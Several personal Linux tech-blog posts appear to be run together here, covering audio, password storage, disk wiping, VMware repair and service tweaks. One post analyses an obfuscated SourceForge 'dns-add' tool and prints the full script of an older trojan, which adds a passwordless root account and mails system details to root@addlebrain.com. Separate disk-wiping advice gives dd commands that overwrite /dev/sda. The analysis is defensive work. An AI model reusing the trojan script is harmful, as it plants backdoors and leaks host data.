Plugin the headphones on the front panel of my box didn’t mute the output to the speakers, which nullified the purpose of having headphones.

I long thought that it was some hardware issue that I would have to sort some day by opening the box and checking the connections.

Yesterday, I decided to solve it for good and I started to google… and found out that it was a pure software issue!

The culprit sounded to be some unproper settings of the ALSA module and this Ubuntu guide just saved me.

I carefully followed the steps and it appeared that for my Gigabyte GA-790FXTA-UD5, it was necessary to this line:

add options snd-hda-intel model=3stack-hp

to

/etc/modprobe.d/alsa-base.conf

Ok, it did not go so smoothly as I picked out randomly models from the list until I find the right one (I had no idea of what was embbeded on my board). I hope this may help, as I have quite a lot of people with similar issues with all kinds of vendors.

Sadly, so far, there is even not the beginning of a replacement solution. Passwords will be there for long, so we would better use them accordingly.

Yes, I am aware of many on-line services like FisrtPass, KeePass, 1stPassword, etc. However, I don’t feel comfortable with having all my password somewhere on-line, even if they claim – and I believe they are sincere, that they use strong encryption and can’t access to it.

Instead, I use a combination of the Firefox password manager and the Pwgen add-on. I use this add-on to quickly and conveniently generate a random password when I subscribe to a web service. When Firefox prompts for it, I just choose to remember the password automatically. SSO quick and dirty.

For the other passwords that I can’t and don’t need to memorize, I store them in a local encrypted file.

To edit the file, I simply use Vim with this nice GPG plugin:

• copy gpg.vim to /home/$user/.vim/plugin
• if not done yet, generate you GPG key :

   $ gpg --gen-key

• Encrypt your password file and erase it:

  $ gpg --encrypt --recipient 'your name' passwords
  $ rm passwords

• Now, it’s done. Just edit password.gpg to decrypt and access to your passwords (you will be prompted for your passphrase):

  $ vim passwords.gpg

If you don’t like the overhead of GPG, a more straightforward solution is to use the OpenSSL extension :

• Copy the openssl.vim file to /home/$user/.vim/plugin as well.

• Now, to encrypt to file to, say, AES (note the .aes file extension which makes sense for the plugin):

  $ openssl aes-256-cbc -in passwords -out passwords.aes

• Decryption will occur as soon as you edit the file with Vim:

  $ vim passwords.aes

I believe that, if not perfect, it is pretty secure. I mean not more, not less than your system is. Anyway I don’t have any need for an on-line manager. And you, how do you manage your passwords? Let us know about your tips.

At least until I found this very instructive article, “Disk Wiping – One pass is enough“. Don’t miss the second part which clarifies some points and gives more details.

In short, after one pass, every bit of the disk is filled with zero and there is simply no way to find out what the previous value was. Even the best tools out there have no clue to do it.

Then, there is a theory of physically restoring each bit using a magnetic force microscope. It has always came with a high error rate, and with modern high density disks it is even less reliable. Now, considering any real world data length, errors occurring on the restored bits would make it impossible to rebuild any usable data. There is obviously no chance for such a technique to recover a file.

So, in the future, I will not only save time doing one pass, but I will replace :

$ dd if=/dev/urandom of=/dev/sda

with

$ dd if=/dev/zero of=/dev/sda

Note that formating just reset the partition table. In no way it clears out every bit of the disk.

My computer crashed and one of the VMware machine hosted on it could not start anymore :

“Cannot open the disk ‘path of vmdk’ or one of the snapshot disks it depends on.
Reason: the specific virtual disk needs repair.

Checking on the VMware forums, I quickly found the command that was supposed to help :

$ vmware-vdiskmanager -R /path/to/disk.vmdk
The virtual disk, '/path/to/disk.vmdk', is corrupted but the repair process has failed.

Damned ! I almost resigned restoring the last backup and loosing a week of work when, by chance, I found the article mentioned above.

As recommended, I downloaded the Virtual Disk Development Kit 1.2 from VMware, untared it and still doubtfully launched :

$ ./bin64/vmware-vdiskmanager -R /path/to/disk.vmdk
The virtual disk, '/path/to/disk.vmdk', was corrupted and has been  successfully repaired.

Saved! Thanks so much to the guys. I would have never thought about trying it, I wonder how they could find it.

But how is it possible that the utility coming with vmware workstation 7.1 suck so much and is not on par with other versions ?

Unfortunately, they are settled with the default basic installation and they have some dependencies (e.g the kernel and zypper) that make them impossible to simply uninstall .

Here is a way to at least deactivate these services at startup on openSUSE 11.2 (it might also work with 11.3).

First, ConsoleKit is not a standalone daemon anymore on the latest versions of openSUSE. It is started along with dbus (you will see that if you stop dbus, all the ConsoleKit thread will magically vanish).

But trying straight to remove dbus from the startup doesn’t work, because of dependencies among services. On my system, it complained like this:

# chkconfig dbus off
 insserv: Service dbus has to be enabled to start service bluez-coldplug
 insserv: Service dbus has to be enabled to start service network
 insserv: Service dbus has to be enabled to start service haldaemon
 insserv: Service dbus has to be enabled to start service earlyxdm
 insserv: exiting now!
 /sbin/insserv failed, exit code 1
 [1]    7954 exit 1     chkconfig dbus off

So, let’s remove the bluetooth stuff:

# zypper remove bluez

Then, we just deactivate the services that can’t uninstalled:

# chkconfig earlyxdm off
# chkconfig network-remotefs off
# chkconfig haldaemon off

You will probably want to keep the network service on, otherwise your configurations scripts won’t be read anymore. In fact, we will just edit the dependency of the startup script itself, by editing /etc/init.d/network and editing these lines:

# Required-Start:    $local_fs dbus
# Required-Stop:    $local_fs dbus

What we do is just deleting the dbus word, so that the script section looks like it:

### BEGIN INIT INFO
# Provides:        network
# Required-Start:    $local_fs
# Should-Start:        isdn openibd SuSEfirewall2_init
# Required-Stop:    $local_fs
# Should-Stop:        isdn openibd SuSEfirewall2_init
# Default-Start:    2 3 5
# Default-Stop:
# Short-Description:    Configure the localfs depending network interfaces
# Description:        Configure the localfs depending network interfaces
#                       and set up routing
### END INIT INFO

Now we are done and we should be able to definitely turn dbus off:

# chkconfig dbus off

Bingo! I didn’t monitor the memory precisely, but I believe I saved around 50 MB, which is always welcomed on a small server.

I don’t know if it is the best way – I may have missed something – however I am pretty happy as it now works as I wanted. Please let me know if you have a better tip.

• a good earing
• smartmontools

Indeed, so far, I haven’t found anything better than launching a process making a lot of disk activity.

This command just do it:

% sudo smartctl -t short /dev/sda

The “short” test will give you a few minutes to carefully listen and select the right disk.

Well, it sure is pretty primitive! But do you know anything better?

By the way, there is a good article for the recovery procedure.

Actually, the purpose of dns-add was very intriguing : update your DNS in one command !

The output should look like this:

...::: ISP-fW DNS add v1.0  :::... http://isp-fw.sourceforge.net/
--== copyleft 2005-2006 ==-- | Free memory:         864
contact isp.devel@gmail.com
You can add up to 9 DNS servers, enter a number from [0-9]: 2
Enter DNS1: 192.168.157.193
Enter DNS2: 192.168.157.251
Done adding 2 DNS!
DNS 192.168.157.193 responded in 0.256 ms
DNS 192.168.157.251 responded in 0.112 ms

Who would need it these days where all distros include tools and script to update the DNS with DHCP. At worst, it is just a matter of opening an editor to add two lines in /etc/resolv.conf. Done in 10 seconds.

To enjoy dns-add, we are supposed to compile the source code. Let’s have a look at it first.

It gets quickly obvious that there could be something nasty. The code is clearly obfuscated, to make it difficult to read:

• not much commented,
• a bunch of strange variables like “\026\243\314\376\220\366\154\166\346\334\005\116\360\114\015\231″. Could be the real code, hidden,
• None of the visible stuff seems to do anything on the DNS.

So now, let’s try to find out what’s behind all that. As we have the source code, the idea is to understand what the code is doing, so that we can write a snippet at the right place to just read the deciphered and potentially malicious code. That’s the easiest way, no need to disassembly and do memory forensic.

A good practice is to look for some pieces of code on the web, as developpers are lazy and often reuse already existing code. Doing that, you can save a lot of time.

Bingo ! There is a code almost entirely identical there.
We learn that the code, as old as 6 years old, actually hid a shell trojan instead of beeing a Red Hat update as claimed.

There is clearly a risk, so we must check what the code of dns-add contains. Here more hints help us again about the encoding used : some comments and a function name mention RC4 (or ARC4).

So let’s see how RC4 works and compare it with its possible implementation in dns-add.
Rougly, RC4 is just an improved XOR whith the help of a lot of keys permutations. I found a clear and short description there :

RC4 has two phases: key setup and ciphering.

The key setup phase is only done once per message and starts by initializing the entire state array so that the first state element is zero, the second is one, the third is two, and so on.

The state array is then subjected to 256 mixing operations using a loop that steps i through the values from zero to 255.

Each mixing operation consists of two steps:
Add to the variable j the contents of the ith element of the state array and the nth element of the key, where n is equal to i modulo the length of the key. (remember, the key here means the 10 byte IV at the front of the file, (or the one your program creates, if encoding), and the given key on the command line. (Key+IV)
Swap the ith and jth elements of the state array.

After the entire mixing loop is completed, i and j are set to zero.

During the ciphering operation, the following steps are performed for each byte of the message:

The variable i is incremented by one
The contents of the ith element of ‘State’ is then added to j
The ith and jth elements of ‘State’ are swapped and their contents are added together to form a new value n.
The nth element of ‘State’ is then combined with the message byte, using a bit by bit exclusive-or operation (XOR), to form the output byte.
The same ciphering steps are performed for encryption and for decryption.

void key(void * str, int len) for setting the key setup phase and void arc4(void * str, int len, char *hint) for the deciphering phase do exactly what’s described above.

They are called by char * xsh(int argc, char ** argv), which we are going to look at carefully now.

This function succevely setup all keys and decipher all the hardcoded vars. Note that a function, chkenv, setup a variable in the environment, based on the PID (and other tricks). It is not useful in the present case, but it could be developped further and used for example to avoid over-infections.

What’s interesting is actually the bottom of the function, where the guy actually builds the shellcode, putting alltogether the pieces of deciphered code.

j = 0;
varg[j++] = argv[0];		/* My own name at execution */
if (ret && *opts)
	varg[j++] = opts;	/* Options on 1st line of code */
if (*inlo)
	varg[j++] = inlo;	/* Option introducing inline code */
varg[j++] = scrpt;		/* The script itself */
if (*lsto)
	varg[j++] = lsto;	/* Option meaning last option */
i = (ret > 1) ? ret : 0;	/* Args numbering correction */
while (i < argc)
	varg[j++] = argv[i++];	/* Main run-time arguments */
varg[j] = 0;			/* NULL terminated array */

Then, it is launched with execvp:

#if DEBUGEXEC
debugexec(shll, j, varg);
#endif
execvp(shll, varg);
return shll;

Before testing further, it is safer to comment out the execvp line.

Now, we just need to retrieve the shellcode, so we just add this lazy piece of code (to insert right before #if DEBUGEXEC):

FILE *fout;
char **tmp;
tmp = varg;
fout = fopen ("dns-test","w");
do {
  fprintf (fout, *tmp);
}
while (*tmp++ != NULL);
fclose (fout);

Here we go :

$ ./dns-add
$ cat shellcode
./dns-add-c           <blank chars skipped>                    #!/bin/bash

dnsfile="/etc/resolv.conf"
failed='\e[1;31m'failed'\e[0m'
ok='\e[1;34m'ok'\e[0m'

function dns_add(){
mv -f $dnsfile $dnsfile.back
for (( i=1; i <= $dns_nr; i++ )) do
    echo -n "Enter DNS${i}: "
    read dns;
    echo "nameserver $dns" >> $dnsfile;
done
echo "Done adding $dns_nr DNS!"
echo
for i in `cat $dnsfile | cut -d " " -f 2`; do
    if [ `ping -c 1 $i | grep -c "100%"` -eq 1 ]; then
            echo -e "DNS $i $failed to respond => request timeout   "
    else
        echo -ne "DNS $i responded in ";
        ping -c 1 $i | grep icmp_seq | cut -d "=" -f 4;
    fi
done
}

clear
echo -e "...::: ISP-fW DNS add v1.0  :::...""\e[1m\e[36;40m" "http://isp-fw.sourceforge.net/\e[0m ";
echo -e "--== copyleft 2005-2006 ==-- | Free memory: $(free -m|grep cache:|cut -d ":" -f2|cut -c12-22)";
echo "contact isp.devel@gmail.com"
echo
echo -n "You can add up to 9 DNS servers, enter a number from [0-9]: ";
read dns_nr;

case $dns_nr in
  [0-9]         ) dns_add;;
  [[:lower:]]   ) echo "$dns_nr is not a number!";;
  [[:upper:]]   ) echo "$dns_nr is not a number!";;
  *             ) echo "$dns_nr is not a number!";;
esac
./dns-add

That’s it. A big C file just for this lame shell script. The good news is that it does what it says. There is no malicious purpose, for now, it’s nothing else than a (bad) joke.

In the case of the original malware, it was more harmfull :

#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then
        echo "This patch must be applied as \"root\", and you are: \"`whoami`\""
        exit
fi
echo "Identifying the system. This may take up to 2 minutes. Please wait ..."
sleep 3
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
 echo "Inca un root frate belea: " >> /tmp/mama
 adduser -g 0 -u 0 -o bash >> /tmp/mama
 passwd -d bash >> /tmp/mama
 ifconfig >> /tmp/mama
 uname -a >> /tmp/mama
 uptime >> /tmp/mama
 sshd >> /tmp/mama
 echo "user bash stii tu" >> /tmp/mama
 cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
 rm -rf /tmp/mama
 mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi

bla()
{
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 3
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 4
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo "#"
  sleep 1
}

echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo
echo "System updated and secured successfuly. You may erase these files."
sleep 1
./badexec 'exec '%s' "$@"' "$@"

Technically, at the end, it is rather basic. However, it is successful in the way that it hides its purpose to most people.
What’s not clear yet is the poster purpose. Fun ? Any other weired feeling ? Or just testing the capacity of the community to detect maliscious software ? If so, was he just curious or does he have any future plan ?
Maybe I should ask him.

Anyway, how many people opened and read the code ? Especially on a community driven website where people tend to have a dangerous feeling of trust and safety : it can’t be malicious, the author offers the source code and nicely shares his work, right ?
And among the few people who checked the code, who really understood it ? Not everyone is an IT specialist. And even among them, not everyone is a developper or can read C.

It highlights well several things :

• social engineering is multi-platform ! We are often more vulnerable than our systems. Linux user or not.
• software published with the source code doesn’t mean safe software.

As much as possible, download software exclusively from the official repositories of your favorite distribution (openSUSE ).
If you really have to use code from an untrusted source, check it, or wait for the right people to do it! Don’t just grab any code, compile it and execute it blindly.

At the same time as open-source software grows, we, users, and also websites like Sourceforge will have to be more carefull about the content we download.

* Update *

I did contact the author and didn’t get any answer.
I reported the issue to Sourceforge, which deleted the account hosting dns-add, as it violated the website policies.

You can download the source code dns-add.tar.gz if you want to analyse it.

I was having a daily kernel panic and weired file system corruptions, which I first tought were coming from the successive crashes and reboots.

However, while it happened again and again and I could not find any good reason for that, I became more doubtful about my hardware and finally found the culprit.
I booted on Memtest, installed with zypper from the repo, which immediately displayed a lot of errors. The tedious task of isolating the faulty memory module revealed that it was one from a Ballistix bundle that I bought just 3 months ago.

I usually use Kingston or Corsair and never had such a problem, but maybe I was just lucky. I will test now the customer service of Ballistix.